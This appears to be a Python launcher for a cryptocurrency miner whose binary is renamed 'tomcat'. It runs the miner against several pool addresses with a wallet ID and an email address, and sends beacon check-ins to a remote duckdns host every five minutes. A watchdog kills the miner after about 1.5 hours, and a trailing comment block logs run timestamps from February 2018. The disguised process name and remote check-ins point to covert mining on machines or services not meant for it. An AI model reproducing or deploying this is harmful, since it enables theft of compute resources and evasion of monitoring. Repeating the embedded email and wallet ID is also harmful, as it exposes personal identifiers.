import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:54:07.618328
#2018-02-17 16:43:01.800831
#2018-02-17 18:31:06.593450
#2018-02-17 20:19:06.090784
#2018-02-17 22:06:01.796778
#2018-02-17 23:50:06.924491
#2018-02-18 01:39:01.394084
#2018-02-18 03:25:07.662440
#2018-02-18 05:13:05.008926
#2018-02-18 07:05:03.471302
#2018-02-18 08:53:03.584889
#2018-02-18 10:40:04.080281
#2018-02-18 12:25:02.888574
#2018-02-18 14:13:02.183062
#2018-02-18 16:03:02.207048
#2018-02-18 17:51:05.240307
#2018-02-18 19:38:01.284806
#2018-02-18 21:23:05.945018
#2018-02-18 23:12:01.766896
#2018-02-19 00:57:07.162057
#2018-02-19 02:44:01.525047
#2018-02-19 04:31:04.627133
#2018-02-19 06:16:01.884551
#2018-02-19 08:04:02.168904
#2018-02-19 09:54:01.711683
#2018-02-19 11:43:01.812461
#2018-02-19 13:30:09.799747
#2018-02-19 15:19:03.942709
#2018-02-19 17:07:07.222397
#2018-02-19 18:52:06.112759
#2018-02-19 20:41:04.516755
#2018-02-19 22:28:06.259207
#2018-02-20 00:14:03.515493
#2018-02-20 02:02:05.316819
#2018-02-20 03:52:07.332392
#2018-02-20 05:37:03.537819
#2018-02-20 07:22:05.734027
#2018-02-20 09:09:05.760398
#2018-02-20 10:52:01.380124
#2018-02-20 12:39:07.431425
#2018-02-20 14:25:07.387447
#2018-02-20 16:11:06.662210
#2018-02-20 17:56:06.719552
#2018-02-20 19:48:06.488826
#2018-02-20 21:37:06.237784
#2018-02-20 23:20:09.459039
#2018-02-21 01:06:07.872767
#2018-02-21 02:53:07.505031
#2018-02-21 04:42:07.901988
#2018-02-21 06:30:10.321811
#2018-02-21 08:17:05.414264
#2018-02-21 10:03:08.176009
#2018-02-21 11:50:12.800100
#2018-02-21 13:42:01.780248
#2018-02-21 15:26:02.255077
#2018-02-21 17:17:06.552771
#2018-02-21 19:06:08.298475
#2018-02-21 20:55:02.730968
#2018-02-21 22:41:08.217078
#2018-02-22 00:29:01.582389
#2018-02-22 02:17:03.430303
#2018-02-22 04:03:07.709263
#2018-02-22 05:49:04.245754
#2018-02-22 07:36:06.926152
#2018-02-22 09:24:06.149125
#2018-02-22 11:10:09.441249
#2018-02-22 12:57:09.045611
#2018-02-22 14:45:07.366671
#2018-02-22 16:33:01.410851
#2018-02-22 18:18:01.905100
#2018-02-22 20:08:01.663689
#2018-02-22 21:56:04.431703
#2018-02-22 23:43:07.094292
#2018-02-23 01:32:06.721140
#2018-02-23 03:18:07.302165
#2018-02-23 05:06:05.362593
#2018-02-23 06:51:05.122658
#2018-02-23 08:35:08.197697
#2018-02-23 10:49:08.174290
#2018-02-23 12:47:12.059721
#2018-02-23 14:31:09.496559
#2018-02-23 16:22:07.889399
#2018-02-23 18:09:04.940478
#2018-02-23 19:55:10.572575
#2018-02-23 21:38:01.407921
#2018-02-24 00:12:08.454477
#2018-02-24 02:04:07.489627
#2018-02-24 03:55:07.606202
#2018-02-24 05:41:05.744592
#2018-02-24 07:32:04.266200
#2018-02-24 09:18:04.680591
#2018-02-24 11:13:06.104014
#2018-02-24 13:02:06.251511
#2018-02-24 14:49:04.098653
#2018-02-24 16:41:05.333347
#2018-02-24 18:29:04.390742
#2018-02-24 20:15:07.862575
#2018-02-24 22:06:06.190941
#2018-02-25 02:26:07.412287
#2018-02-25 06:06:01.752241
#2018-02-25 11:38:08.039777